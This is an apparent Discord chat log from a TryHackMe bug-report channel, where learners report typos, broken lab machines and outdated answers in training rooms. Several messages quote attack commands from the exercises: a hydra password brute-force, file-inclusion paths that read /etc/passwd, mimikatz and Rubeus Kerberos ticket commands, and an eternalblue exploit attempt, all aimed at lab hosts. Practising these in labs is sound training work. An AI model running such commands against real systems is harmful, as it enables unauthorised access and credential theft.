rugged canyon
#

you mean you skip enumarating all the machines that has port 80 open???

#

that seems more ignorant to shadow

near juniper
rugged canyon
#

fair and shadow don't feel like arguing

#

after all it is an older room that might not be up to newer QA standards

still elk
hazy tiger
# still elk Thanks thm for nothing for 2 weeks

When we look to fixing rooms, we see how many people reporting it as broken.

You are the only one who has reported it as broken so I can only presume that youโ€™re either A: not waiting long enough for the box to start, or B: doing something wrong and not telling us enough about your issue to help

๐Ÿ™‚

solar rampart
#

Don't know if this is the right forum for this kind of stuff.
Room: https://tryhackme.com/room/webenumerationv2
Task 9
Question 2: WPScan says that this theme is out of date, what does it suggest is the number of the latest version?
Answer: 2.3
But in fact the latest version is 2.4.
It's not critical or anything but felt like sharing

near juniper
bright plover
#

Not sure if this is the correct place to report typos in rooms but here goes:
In buffer overflows, task 4 "In the above example, we [save] that functions" should be "saw". "rdi, rsi, fx, rcx r8 and r9 are called saved" should be "rdi, rsi, rdx, rcx[,] r8[,] and r9 are [callee] saved."

quaint sparrow
shadow pawn
#

I think I may have found a bug in the futhernmap room. the answer is 999 but i do have 4 ports open ๐Ÿค” . or am I wrong? Mans a noob ๐Ÿ˜„

raw bison
tropic yoke
sonic geyser
distant token
#

In Windows Fundamentals 2 task 7 covering the netstat command no image is displayed to show a red box highlighting the syntax. I was able to find the picture through inspect element at https://assets.tryhackme.com/additional/win-fun2/netstat.png. I was taking notes on the room when I noticed the task mentioned an image above referring to the syntax for netstat but nothing was displayed.

Room: https://tryhackme.com/room/windowsfundamentals2x0x

vivid drift
dusky junco
#

@hazy fulcrum you're up^ ๐Ÿ˜„

calm frigateBOT
#

Done!

somber apex
#

https://tryhackme.com/room/zer0logon
Task 2 - When I run the first command to install virtualenv, it gives me an error about pip being an older version and suggests I upgrade, so I do and run the second command to set up the virtual environment for impacket, the command on the page gives an error, but if you run 'python3 -m venv impacketEnv' it works.

pearl mesa
#

I have the same confusion. I am wondering if you finally find a solution the deal with this problem?

atomic anchor
wheat fractal
#

Room: File Inclusion, Task 6, first line says: Remote File Inclusion (RFI) is a technique to include remote files and into a vulnerable application.

I believe the word and should be removed, also the word into sounds weird, i dont know if it should stay as into, or the sentence re-written a bit, but either way, the word and I don't think is needed

vivid drift
solemn brook
#

Hi, I noticed that in the Zeno room, /root/bash_history is linked to /dev/null instead of /root/.bash_history

This isn't really big, but this means the command history from when (I think?) the box was being developed is still readable.

calm frigateBOT
#

Done!

stiff plank
#

On room https://tryhackme.com/room/goldeneye, the VM is not starting.
The button works, and the "Starting machine" notification pop-up shows up, however there is no machine, IP, timer information on the room.

woven shadow
lofty cloud
crude token
#

https://tryhackme.com/room/pyramidofpainax

Task 5 Question 3:
"Using your OSINT skills, what is the name of the malicious document associated with the dropped binary?"

Problems:

  • Question 3 is a duplicate of Question 4.
  • Given the correct answer to Question 3, it seems like the wording is wrong.

Suggested Solution:
Change Question 3 so it reads like so:
What is the executable file dropped by the malware?

wary coral
#

It might be a bug in the OWASP Top 10 room in the Complete Beginner path. On task 11, the hint from the developers is missing from the webapp source as far as I can tell. Tried to relaunch the machine and use different computers on this one, same issue. ๐Ÿ™‚

still elk
vivid drift
marble grove
#

Hi! In room https://tryhackme.com/room/metasploitintro, "Working with modules" section, LHOST is described as "Localhost", which in my opinion really should be "Local Host", as localhost usually bears a very specific loopback meaning.

still elk
glad badger
#

Fixed. ๐Ÿฅณ

vivid drift
#

whooop ๐ŸŽ‰

still elk
bright plover
#

ran into a bug in the adenumeration, task 1. when requesting AD credentials you can get a username that is over 30 characters when combined with the domain name. I got around this by requesting another set of credentials until i got one that was shorter. Due to the domain name of za.tryhackme.com the username can be at most 13 characters long, but the distributor page can give out usernames that are longer.

brazen nexus
#

For what it's worth, the layout of Burp Suite no longer matches the questions of task 7 in the room Burp Suite: The Basics. The task says to use either the attackbox or your own copy, but you have to use the attackbox or find screenshots of Burp at the moment. If there's anyway I can do leg work to make it easier to update, I'm willing to do it.

steady bone
strong anchor
#

OWASP JUICE Shop password brute force does not work properly

#

Or at least the instructions are not correct

raw bison
strong anchor
#

You assuming I didn't ask anyone

raw bison
#

And since I highly doubt there is a bug on that room (which I can be also wrong), it's best to ask in #room-help first.

strong anchor
#

I did my research and I asked other participants about it. We all had the same problem... But hey it's cool ๐Ÿ˜Ž๐Ÿ˜„๐Ÿ‘

raw bison
strong anchor
#

I found 2 bugs actually but since you wanna be defensive someone else will follow protocol and report it, cool? Cool!

raw bison
strong anchor
#

I'm not passive aggressive, your approach was aggressive but honestly I think nothing of it. The 2nd wasn't a bug my bad lol more like an instruction update... Otherwise Juice Shop was a fun room

queen meteor
nocturne stratus
fair quest
eternal pawn
#

Good evening , my Tryhackme is not showing me my progress on my rooms. && when I try to enter the room I am currently working on it is not working it says I am already apart of the room. I try contacting tech support and emailing THM but no one responded.

lunar drum
#

Room

- <https://tryhackme.com/room/shodan>

Google & Filtering

- What is the top operating system for MYSQL servers in Google's ASN? 
    * Is:    ||5.7.39-42-log||
    * Wants: ||5.6.40-84.0-log||
- Under Google's ASN, what is the most popular city?
    * Is:    ||Kansas City||
    * Wants: ||Mountain View||
- Under Google's ASN in Los Angeles, what is the top operating system according to Shodan?
    - Is:    ||Debian||
    - Wants: ||PAN-OS||

Shodan Extension

- Text Duplicated

Overall

- No Images
naive tapir
#

For room owasp api security top 10, task 4, section Practical Example, the example details de header as "Authorisation-Token" the application in the room accepts "Authorization-Token" with Z

hazy tiger
#

Unless it has changed but Iโ€™m pretty sure I already checked this two days ago:)

rugged canyon
fair quest
# hazy tiger It has both, in the room text it says โ€œauthorizationโ€ but in the title it says โ€œ...

"The endpoint will return a token, which will be passed as an Authorisation-Token header (GET request) to apirule2/user/details to show details of the specific employee. Bob successfully developed the login endpoint; however, he only used email to validate the user from the user table and ignored the password field in the SQL query. An attacker only requires the victim's email address to get a valid token or account takeover." - that's what's said in task content, a bit misleading imo for someone that didn't work with auth headers before

naive tapir
wheat fractal
#

room: SQL Injection
Task 4 - What is SQL Injection
Under the question: What does it look like?
Second paragraph says the following: From the URL above, you can see that the blog entry been selected comes from the id parameter in the query string (I think it should say being and not been)

rancid iris
#

hi all, i found a bug in a task. Hope I'm in the right group here.

Room: Subdomain Enumeration https://tryhackme.com/room/subdomainenumeration
Task: #3
It mentions the search term -site:www.tryhackme.com site:*.tryhackme.com in the text, but the "-" sign in the beginning should be removed to get the correct answer from google.
See screenshot.

#

oh. but it worked either way?

#

cool. ๐Ÿ™‚ thanks

queen meteor
#

Same problem here. Looks like the new host does not provide the expected answer anymore.

wheat fractal
#

not trying to to be nit picky on grammar in rooms ๐Ÿ˜ฆ but since this channel is here, I bring up things that I notice, as a helpful fix to make the rooms better ๐Ÿ™‚

#

Room: SQL Injection
Task 6: Blind SQLi - Authentication Bypass
First paragraph for Blind SQLi, last sentence says the following: It might surprise you that all we need is that little bit of feedback to successful enumerate a whole database. (I think it should be successfully)

agile sequoia
#

Can we fix this? I can't enter the "Recon" answer because the answer field is missing. I'm sure lots of folks are hung up on this bug and cannot proceed with training.

glad badger
agile sequoia
#

hey

#

I did. It's missing an answer field so you can't proceed with the thing./

glad badger
agile sequoia
#

No they aren't. They're identical to the image on the left. Answers on the right.

#

Not sure what you're looking at.

#

But you can see how "Recon" is missing from the right answer area, right?

glad badger
agile sequoia
#

ok. I'm working but will re-look later. Still looks like a bug though

#

I teach CEH on Monday. Developing hands-on hackcercises for students.

copper tide
#

Hello.

#

@slow epoch In your room, I would like to inform you that the hotel you mentioned in the last exercise no longer exists in the latest Google Maps updates.

#

That way it would be interesting to update to prevent the room from being "broken". Thanks for the room. ๐Ÿ™‚

cinder jasper
#

https://tryhackme.com/room/cve202226923
This room has something wrong. second command that is used to verify the cert isn't working. I have tried it using both my vm and attackbox like the room suggests and nothing seems to be working.

stiff plank
stiff plank
#

@cinder jasper did you manage to run the command?

cinder jasper
#

The command to generate the certificate works but the second command to validate is not.

stiff plank
#

https://tryhackme.com/room/adcertificatetemplates
task 5: command:
Rubeus.exe asktgt /user:svc.gitlab /enctype:aes256 /certificate: /password:12345 /outfile:tgt.pfx /domain:lunar.eruca.com /dc:10.10...

https://tryhackme.com/room/cve202226923
Testing Certificate Generation
certipy-ad auth -pfx thm.pfx

Since is the same VM, both rooms are showing the error below while following the steps:
[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
@crystal bolt

next plinth
#

https://tryhackme.com/room/malbuster
Task2:
Q: Based on VirusTotal detection, what is the malware signature of malbuster_2 according to Avira?
Problem: Looks like Avira has changed Signature name of detected malware. I have answered question before and it was different, checking like 2h later, signature is different...

wheat fractal
#

Hi, the Insekube room hasn't been working properly for weeks, any news about this ? Port 80 is closed, so it's not even possible to get past task 1. https://tryhackme.com/room/insekube

stiff plank
formal hazel
#

https://tryhackme.com/room/metasploitintro
Task2:
What the course say:
Metasploit has a subtle way to help you identify single (also called โ€œinlineโ€) payloads and staged payloads.

generic/shell_reverse_tcp
windows/x64/shell/reverse_tcp

Both are reverse Windows shells. The former is an inline (or single) payload, as indicated by the โ€œ_โ€ between โ€œshellโ€ and โ€œreverseโ€. While the latter is a staged payload, as indicated by the โ€œ/โ€ between โ€œshellโ€ and โ€œreverseโ€.

Question:

Is "windows/x64/pingback_reverse_tcp" among singles or staged payload?

Problem:
Agree for Singles!

languid moth
#

Looks like the Windows Internals room machine is gone

viral dirge
dusky junco
brave frigate
#

@lucid oasis
Hi community,
Does anybody get the website up and running for room SQL Injection Lab ?
https://tryhackme.com/room/sqlilab
Tried several times, but neither Firefox or chromium can load the website

hazy tiger
viral dirge
crystal bolt
brave frigate
hazy tiger
brave frigate
hazy tiger
brave frigate
calm frigateBOT
#

Done!

stray quiver
#

Room OWASP Top 10, Task 6 "Broken Authentication Practical" The target site does not respond to 8888 -
https://tryhackme.com/room/owasptop10

Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 09:52 Central Standard Time

Nmap scan report for 10.10.197.126

Host is up (0.11s latency).

PORT STATE SERVICE
80/tcp open http
443/tcp closed https
8888/tcp closed sun-answerbook
Nmap done: 1 IP address (1 host up)

stray quiver
#

Terminated and created a new instance and it worked

potent sage
#

Hi all, in https://tryhackme.com/room/jumpbox, only SSH is up, port 80 and 8443 not work! It doesn't look like my nmap's result from a few months ago. Both premium and normal account have same issue. Please check it!

quaint sparrow
#

@raw bison

calm frigateBOT
#

Done!

wild wyvern
#

I am having an issue in Network Security - Task 3 - the ftp server port is not open, so I can't grab the secret.txt file to complete the lesson

wild wyvern
#

10.10.247.77

quaint sparrow
wild wyvern
#

on the Attack box

#

I started the lesson several times, same result.

quaint sparrow
#

You're using the wrong IP.

#

You need to use the machine listed in the task.

wild wyvern
#

I tried that too - no joy

quaint sparrow
#

Try it, and wait 5-10 min(s)

#

Machines won't be deployed with the services running, you sometimes need to wait.

wild wyvern
#

okay - its been up for 30 mins already

quaint sparrow
#

10.10.247.77 ?

#

That's because it's the wrong machine.

wild wyvern
#

The instructions and the image say to "nmap MACHINE_IP"

quaint sparrow
quaint sparrow
wild wyvern
#

I tried that, I tried the IP's in the examples. Okay - I will try that again.

quaint sparrow
#

Then the IP will show there.

#

And nmap Machine_ip will update

wild wyvern
#

Okay, thanks. Then I use the blue box to "Start AttachBox"?

quaint sparrow
#

Yes. ๐Ÿ™‚

wild wyvern
#

Thank you! Been messing with this for an hour.

#

Thank you so much - it's working now!

quaint sparrow
#

Happy hacking!

wild wyvern
rotund valve
#

Hello,

I'm doing the redline room and trying to import the analysissession1 to redline after running the script as admin privs. Im getting unknown error and opening it only shows me:
Timeline
Tags and comments
Acquisition history

While creating the script i edited it as the room states. Nevertheless due to the error in importing all the information needed to complete the task. (For example System information) show as not collected?

Anyone got tips or tricks for this. I noticed that the VM Local disck is really full so could that be effecting my issue?

manic tree
#

I'm trying to do task 5 in the SSRF room, but the website won't load through my attack box. any help would be appreciated, can send a screenshot of the problem in a dm but the server doesn't allow it.

stray quiver
#

OWASP room task 12, target machine won't start, my id "vpgrem"

frail swan
#

Just went through this and it was driving me crazy not being able to find the answer by 'view page source'. I ended doing 'inspect' and found the answer that way..

calm frigateBOT
#

Done!

quaint sparrow
#

@eternal summit you around?

calm frigateBOT
#

Done!

eternal summit
old sandal
#

For room sysinternals, task 9, the result showing from the vm is not the accepted answer of the task. I did a quick search in this discord server and saw multiple people have faced the same problem. Maybe the answer needs to be updated?

misty cypress
#

I think in the Packets & Frames room in the Network Fundamentals module in Task 4 (UDP/IP) there's an error in the second table (showing some of the UDP packet headers). In the description of the Source Port Header it says "This value is the port that is opened by the sender to send the TCP packet from." which doesn't make sense to me when talking about UDP packets

magic idol
#

anyone having problems with "Internal" ??

#

I just canยดt login with the credentials I found

#

and it should be right, because I followed the same steps as the Writeup

frail swan
#

If I wanted to replace the contents of a file named "passwords" with the word "password123", what would my command be?
echo "password123" >> passwords

Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be
echo tryhackme && passwords

Pretty sure I got these questions wrong, but somehow they were marked 'correct' lol

magic idol
#

">>" means append to the end

frail swan
magic idol
#

which room?

frail swan
#

Linux Fundamentals Pt 1 Task 7

eternal summit
quaint sparrow
#

If you refresh the page, the correct answer will be displayed.

torn lotus
bright grotto
#

It did not work. I restarted this machine five time

dusky junco
thorn moon
misty cypress
#

its the wrong code

#

wait are you talking about task 6 in the room SQL Injection or a different one?

quaint sparrow
#

Spoilers, don't post flags in the chat. ๐Ÿ˜„

lone spoke
#

task 6 indeed

misty cypress
lone spoke
misty cypress
#

thats the code for the task before my guy

#

u need to click on the blue button saying level 3 and then theres a new code displayed on top

lone spoke
#

Strange, i tried 2 times, next level and it was the same, maybe a windows' firefox bug... thanx a lot

misty cypress
#

no problem

lone spoke
#

I deleted the flag from de chat.

lone spoke
#

Other stuff, when i try to insert the sql it doesn't change the query or the sql results (task8) :

#

same thing for task 7. I'm working now on kali and firefox.

misty cypress
#

well thats why its blind, the first part of the union statement needs to be true for the request time to change

mystic wharf
crystal bolt
mystic wharf
#

No worries I just got stuck for a while ... nice to have a confirmation !

lone spoke
crystal bolt
crystal bolt
#

And see you next year again for when the cert expires ๐Ÿ˜‚

mystic wharf
livid escarpBOT
#

Gave +1 Rep to @crystal bolt

calm frigateBOT
#

Done!

civic carbon
#

Nevermind, had to run the snort thing as sudo.

Attention to detail is a superpower.

fair blade
#

managed to solve? I'm in the same problem

quaint sparrow
sharp citrus
#

@nimble locust bad link ?

potent sage
delicate coral
#

Cool

placid abyss
#

@gleaming shadow still here?

calm frigateBOT
#

Done!

steep marten
#

Room: Splunk101 Task: 5, Q1
Is this a bug? The only reason I found the answer is an older message by @pine linden

Disregard

#

Never mind - if you launch the exact same query again, it'll give you the proper number of events. Not sure why but indexing is weird.

thick junco
#

Room: webenumwordpres
Task 9, question 2: The version needs to be updated

hazy tiger
livid escarpBOT
#

Gave +1 Rep to @thick junco

thick junco
rugged canyon
#

I discovered the issue.

delicate olive
#

Indeed, no wharrrr be my bounty ^_^ jk jk. Thanks @rugged canyon for forwarding this to the appropriate channel.

livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
#

@queen sphinx โฌ†๏ธ

#

well then guess juun is busy.... @gleaming shadow you there???

calm frigateBOT
#

Done!

rugged canyon
#

thank you hydra

queen sphinx
#

sorry am in meeting

rugged canyon
#

no problem juun... should have checked if others were available with online mode first

narrow robin
#

hello guys,

Room " startup " doesn't wanna start, normal ?

hazy tiger
narrow robin
hazy tiger
#

Does this occur on all rooms or just this one?

narrow robin
white jewel
#

task 4 machine in nmap basic wouldnt launch for me

atomic lion
#

Splunk incident response room not loading after three reboots giving about 5 to 10 minutes between each try.

indigo stag
sharp wind
#

hey guys, Ejpt path --> /room/fileinc , task 5 , says try to answer lab 5 , but the last 2 questions states that both for lab 6 is it mistaken or lab 5 question got deleted ? thanks

#

it's clear that it's just a practice no question for that lab , nvm

#

the last question is for the playground , people may mistaken that it's in LAB#6 and waste time on lab#6 ๐Ÿ™‚

eager salmon
#

yes

#

carfull account ngrok banned :/

civic carbon
#

Can I report, not quite a bug, but more of an example command that's not quite right here?

#

https://tryhackme.com/room/hydra#

Example command, in Task 2, Post Web Form section:

hydra -l <username> -P <wordlist> 10.10.25.173 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

missing "login" from "/:username...."

Fixed command for my run:

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.25.173 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V

delicate olive
#

File Inclusion: Task 4, Question 1 - Answer accepts only absolute paths and not "walked" paths. I'd imagine this should accept either.
/lab1.php?file=/etc/passwd and /lab1.php?file=../../../../etc/passwd should reasonably be equivalent answers.

hazy tiger
delicate olive
#

I'll submit feedback there. But, I do hope it will be reevaluated; IMO it's hard to argue that a valid path to the flag in the VM should either be considered an invalid answer unless there is a bug either in the form evaluating the answer or in the web app in the VM from which the flag is recovered. And, it's incredibly confusing as a user.

hazy tiger
# delicate olive I'll submit feedback there. But, I do hope it will be reevaluated; IMO it's hard...

Some things to be ware of, first the answer box details the format of your answer. If your answer is any longer than that one, it is incorrect. As you can see in the answer, there is no directory walking.

Furthermore, in the room task it says Theoretically, we can access and display any readable file on the server from the code above if there isn't any input validation. and provides the example of http://webapp.thm/get.php?file=/etc/passwd.

It is very important to read the room carefully, your first step should be to see if there is any input validation, and to do that, you use the example provided (which will give you the answer).

Unfortunately, we are unable to accept every different form of directory traversal because let's say that ../dir/ works and ../../dir works and ../../../dir/ works etc., it would have a massive amount of possibilities. This is similar to XSS rooms that could have hundreds of payloads that work, but the room is looking for a specific payload.

This payload should be hinted towards in the explanation to point the user in the correct direction.

delicate olive
#

Thanks for the feedback. Highlighting that the answer box will reliable indicate the correct shape of the payload string to be evaluated is a key takeaway that I'm sure will limit my odds of running into this sort of issue in the future.

midnight iron
#

Hello, I'm doing Room "Reversing ELF" on an Arch Linux machine, and when I run index.crackme7 or index.crackme8 executable, I get the error :

./index.crackme7

exec: Failed to execute process './index.crackme7': The file exists and is executable. Check the interpreter or linker?

Are these two files not suitable for running on Arch Linux machine? Can you verify please?

midnight iron
#

PS: solved. It was needed to install lib32-glibc package.

worthy turret
#

Hey, I have an issue with Room "Razorblack" (https://tryhackme.com/room/raz0rblack). When I'm trying to change the SMB password of a user, which is required for progress, I get an error which says "The transport connection is now disconnected.". Has anyone had the same problem?

midnight iron
#

Sakura Room Task 5 2nd question Flag Format wrong. It is reported to be: http://[deeppasteURL].onion/show.php?md5 but any working deep paste URL don't work, either the one from the hint screenshot. Please fix it.

#

So I should use the hash in the screenshot hint and not the one I effectively found

midnight iron
#

On room WebOSINT, the last question of Task 2 has old (currently wrong) answer

#

The Registrant Country is not accepted as answer. I needed to take a writeup for discovering the valid answer that is a country not listed in WHOIS

elder berry
#

anyone else having problems with the room "walking an application" website? i load up attackbox and type it in and all it does is give me a 504 timeout error.

violet geyser
#

Typo in Windows Event Logs room

#

If you don't know exactly what a SEIM is used for, ```
#

SEIM should be SIEM

orchid schooner
#

room Nmap Basic Port Scans. Task 6 UDP Scan is no longer showing the service on port 53 Domain. Had to google the answer to get through

shy lotus
#

Hi! you have a typo in metasploit room (expolitation) PORTS: Port range to be scanned. Please note that 1-1000 here will not be the same as using Nmap with the default configuration. Nmap will scan the 1000 most used ports, while Metasploit will scan port numbers from 1 to 10000. (one zero too much at the end)

eternal summit
hazy tiger
#

That's correct, no?

shy lotus
hazy tiger
#

Looking at the example provided in the room, it also says 10,000

eternal summit
shy lotus
#

you are right, there is no mistake

#

thank you for pointing it!

outer prawn
#

Hello, I am in the Network Services room, working on Task 6, the Telnet Enumeration. I am tasked to use nmap to find any open ports, but nmap keeps telling me all 1000 ports are closed. Not sure what I can do to solve the tasks, because I cannot find an open port. Any help would be much appreciated.

quaint sparrow
rocky osprey
#

Hello I am in the Crack the hash room, Task 1 last hash (The MD4)
When i tried to crack it with hashcat + rockyou.txt i was getting Exhausted Status again and again.
When i did a research about it i saw that the hash leads to "Eternity22" but in the rockyou.txt there is only "eternity22"
When i added the "Eternity22" to the rockyou file it worked i saw that as a bug maybe someone should check it ๐Ÿคท๐Ÿปโ€โ™‚๏ธ

rocky osprey
#

Both

#

Actully no only vm

#

I tried to even download the rockyou again but still worked only when added the word

quaint sparrow
#

There is a chance Eternity22 is on the attackbox Rockyou.

rocky osprey
#

No

#

Just checked

#

there is only eternity22

#

eternity22 -> 1dc9056eb023a3f97b4ea757ad5b6951 -> in the rockyou.txt

Eternity22 -> 279412f945939ba78ce0758d3fd83daa -> The answer in tryhackme but not in the rockyou.txt worked only when added manually the word to the file

eternal summit
rugged canyon
eternal summit
#

Isn't it a challenge room?

rugged canyon
#

if shadow recalls correctly

eternal summit
#

The really old one?

rugged canyon
#

never mind the hint for the question right before talks about using masks and rules

calm frigateBOT
#

Done!

swift wind
#

Hey all, I'm connected to the VPN, and I have started the machine in the Vulnversity room, and so I should be able to connect to the machine by putting the IP address in the browser's address bar, yes? It keeps telling me there's a problem loading the page.

obsidian kiln
#

Not every machine runs a webserver. Those that do may not run a webserver on the default ports

swift wind
#

Ok, well it looks like it's running a web server when I scan it in nmap, but that's fine. I think I can complete the room without the target interface.

dapper gate
violet geyser
#

The above code snippet will look for any DLLs that have been loaded within the \Temp\ directory. If a DLL is loaded within this directory it can be considered an anomaly and should be further investigateded.

#

Typo in Sysmon room, task 2, investigateded, should be investigated

muted stone
#

Small typo error in Wireshark101 Room where task 13 (pcap analysis regarding zerologon) says to open the task11.pcap but it's actually the task13.pcap that is meant to be opened

mental niche
#

Hey everyone,
Does anyone know if there's a problem with Wreath Task 21 - "What is the Administrator password hash?" ?
I keep using the Hash NTLM value found in the same task, but it keeps telling me "Uh oh! your answer is incorrect."
I later used the same hash for the winrm step and successfully connected.

obsidian kiln
dusky junco
#

Hey, I've forwarded this on internally ๐Ÿ™‚ thanks for reporting!

livid escarpBOT
#

Gave +1 Rep to @tepid wing

clear birch
#

not sure how to report / feed back in here ... there seems to be a skill pre req missing from the web fond class.. as well as a broken link during that path that requires the user to research and gain some hints about using burp ... the link is broken tho..

eternal summit
clear birch
#

Web Fundamentals path mod = File Inclusion task 8 challenge in start of task description link is "https://tryhackme.com/room/webfundamentals" which goes to > Room is private "If this is an error on our behalf. Please contact us." i went to google a guide and found burp was needed.. which made me realize that had not been brought up at all during the path thus far so I am assuming it was hinted / discussed in the private link area.. but that might also indicate the need to list something like CompTIA+ path as a pre req for this considering the tool usage and things one would typically require ...
hope that makes sense ...

eternal summit
#

cc @glad badger The link here isn't updated

true canopy
#

currently learning AD, and started with https://tryhackme.com/room/winadbasics but under the group policy sub section I noticed something which had me startled for a while, not a bug per se more of a typo but can be confusing to understand without looking at the diagram

The first thing you will see when opening it is your complete OU hierarchy, as defined before. To configure Group Policies, you first create a GPO under Group Policy Objects and then link it to the GPO where you want the policies to apply. As an example, you can see there are some already existing GPOs in your machine:

I believe the intent was for it to be: you create Group policies under Group Policy objects and then link it to the OU where you want the policies to apply, please correct me if I am wrong.

lunar drum
pastel lark
#

In Sysinternals room (https://tryhackme.com/room/btsysinternalssg) at task 9 - Strings running strings at Zoomlt.exe produce different path than expected as correct answer. Moreover there are actually two of them, so clarification would be handy.

bright grotto
pastel lark
placid abyss
#

Hint: check the port

eternal summit
#

And protocol

violet geyser
#

Typo in Breaching Active Directory Task 4: Note that if you use the AttackBox, the you should first disable slapd.
Should be then you should instead of the you should

#

Also noting, most systems have resolvectl now instead of systemd resolve. In Task 1, the configuration commands should be updated with the resolvectl commands
Which in this case is:
resolvectl dns breachad $THMDCIP
resolvectl domain breachad za.tryhackme.com

#

Can confirm that the rest of the box works when using these commands in lieu of systemd-resolve.

thick junco
#

room: Johntheripper0
Task 1: [...] abstractly it means that the algorithm to hash the value will be "NP" and can therefore be calculated reasonably. However an un-hashing algorithm would be "P" and intractable to solve- meaning that it cannot be computed in a reasonable time using standard computers.
P is easy to compute and NP is tough to compute, so hashing should be P while un-hashing should be NP

cobalt halo
#

THIS IS MY COMMAND: mimikatz # kerberos::ptt TGS_t1_melanie.wilson@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

#

THIS IS THE RESPONSE: * File: 'TGS_t1_melanie.wilson@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_mkerberos
ptt_file ; kull_m_file_readData (0x00000002)

#

This is on Task 3 of exploiting active directory

cobalt halo
#

SOLVED:

#

use "token::revert" command in mimikatz after the lsadump

#

exiting (as seen in the room instructions) is not enough

tawdry sonnet
#

I'm going through Sysinternals (btsysinternalssg) and Task 9 question, I had to use a writeup to find the correct answer. Doing exactly what the writeup did resulted in me getting a different path for the .pdb file compared to the writeup and correct answer.

wispy geode
#

@raw bison

calm frigateBOT
#

Done!

pastel lark
#

In Windows Event Logs (https://tryhackme.com/room/windowseventlogs) Task 2, the last question is a little bit ambiguous since it says PowerShell, and the previous ones were also about PowerShell, but there is no Event with ID 800. So instead of googling writeup I would appreciate a help saying e.g. Isn't there one more PowerShell in the left pane?

copper tide
#

Hello

rugged canyon
#

and that marks the 4th time shadow sees someone mention this.... so yeah bugged

copper tide
#

Is the Brainstorm room buggy too?

#

I downloaded the binaries from FTP and I can't run. Not even through CMD.

dusky junco
#

and 64 bit

copper tide
#

Even in compatibility mode it is not running. ๐Ÿ˜ฆ

#

This Offensive Pentesting path was super interesting until it got to the Buffer OverFlow part. This whole part should be more basic and orientative... But I'm having a lot of difficulty learning about the subject and other than that some machines are wrong.

cobalt halo
#

Been waiting over a half an hour in Task 6 of Exploiting Active Directory for the GPO to apply.

#

Is there a way to force this?

#

Still can't RDP with my IT Admin credentials

eternal summit
copper tide
eternal summit
#

Hence I cannot see you downloading them in binary mode explicitly, which you need to do.

cobalt halo
#

It's been over an hour now waiting for GPO to apply.

#

Anyone else having issues with AD exploiting room?

#

JUST GOT IN! total time about an hour and 15ish

obsidian kiln
cobalt halo
cobalt halo
#

Lol

obsidian kiln
#

Decent chance they've tried to change the default and either screwed it up or something went wrong with that specific instance and it reverted to default

cobalt halo
#

Wouldn't surprise me

#

Thanks for the Microsoft doc snippet, I learned something new! ๐Ÿ˜ƒ

fair scarab
#

i mean you could trigger a manual push for the gpo

obsidian kiln
#

Np!

cobalt halo
#

Tried it

obsidian kiln
fair scarab
cobalt halo
#

Is that the command you were thinking of our is there another one?

#

I'm fairly new to AD.

obsidian kiln
#

I'm not sure the context here kekw
If it's lateral movement or local privesc via GPO abuse then force update won't work for you (or, would, but if it did then you wouldn't need to exploit it)

#

If it's just messing around with GPOs to see how they work then yeah, gpupdate /force running as local admin on the target machine is exactly how you'd do it manually

fair scarab
#

yeah nah you're right been a long day ๐Ÿ˜„

obsidian kiln
#

Aha, know that feeling ๐Ÿ˜„ โ™ฅ๏ธ

cobalt halo
#

Let me ask you two, any recommendations for AD labs other than THM?

#

I've had nothing but problems with the THM ones.

#

Is HackTheBox any good?

#

I will say though, all of the other THM content has been pretty good.

obsidian kiln
#

I've not done any of the HTB prolabs. Some of them sound pretty good content wise, although I hear lots of horror stories with shared environments just generally.
I learnt in OSCP, CRTO, and OSEP + plus building labs locally and just messing around with them, personally.

#

That's... an expensive way to do it though

fair scarab
#

also time intensive unfortunately

obsidian kiln
#

Advantages of doing it as a student

fair scarab
#

I do remember something about an automated script that deployed a couple machines for you but cant recall its name, also heard it wasn't that great

obsidian kiln
#

These days I get to mess around with prod ๐Ÿ˜

eternal summit
#

Shared labs have issues inherently

#

People won't behave

obsidian kiln
eternal summit
#

No, please don't do that, it's very impatient

fair scarab
#

sorry.

pastel lark
#

In room https://tryhackme.com/room/ice is a reference to another room, which is made private. Unfortunately it is referencing to a command used there (Task 4, question 2). So it is not possible to answer without a write up.

obsidian kiln
pastel lark
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

hazy tiger
obsidian kiln
quaint sparrow
dusky junco
#

Yeah, I really don't recommend circumventing the private status of a room. It's usually either really broken or still being developed (where you'll get into some trouble)

obsidian kiln
#

Or just replaced by paid content ๐Ÿคทโ€โ™‚๏ธ

split pawn
#

images didnt load in the challenge shodan.io (osint)

placid abyss
#

hey beee @green steppe

green steppe
split pawn
livid escarpBOT
#

Gave +1 Rep to @green steppe

pastel lark
#

At https://tryhackme.com/room/sysmon room there is Hunting Metasploit part, task 5, where is the filtering query with wrong port (or the wrong port is in the Event logs file) 4444 (not found anything) vs 444 (one log entry, the same as shown in the task). Moreover the printscreen also shows port 444, not 4444.

pastel lark
pastel lark
#

Moreover credentials showed in Task 3 are invalid.

tame lion
#

Hi, In Room TheHive Project, the link for the final question is "https://..." it should be "http://..." otherwise it does not seem to be working

cobalt halo
#

The Credential Harvesting AD room is not allowing SCP connections to transfer the files.

#

says scp should work

#

nmap shows port 22 is open

eternal summit
# cobalt halo

Hey, this is unlikely to be a bug on the machine and has a good chance of just being an error with your command. Have you asked in #room-help already?

cobalt halo
#

scp must be disabled in this room

eternal summit
#

I have a very strong suspicion that I know what the issue is. Ping me there, and I'll try and troubleshoot with you.

paper grotto
#

I think I found a bug here is preliminary bug report:

#

Can not complete task when using the web based kali linux machine instead of the attack box.

https://tryhackme.com/room/metasploitexploitation#

Task 5

Steps taken: Started Web Based Kali Linux -> Started Target Machine attached to task 5-> waited 5 minutes -> opened msfconsole on the kali machine -> used the exploit windows/smb/ms17_010_eternalblue -> set all the options required rhosts and rports -> ran the exploit and received this message: " [-] 10.10.239.140:139 - The target is not vulnerable.โ€

Solution: When all the same steps are taken using the attack box I am successfully able to use exploit and gain rce

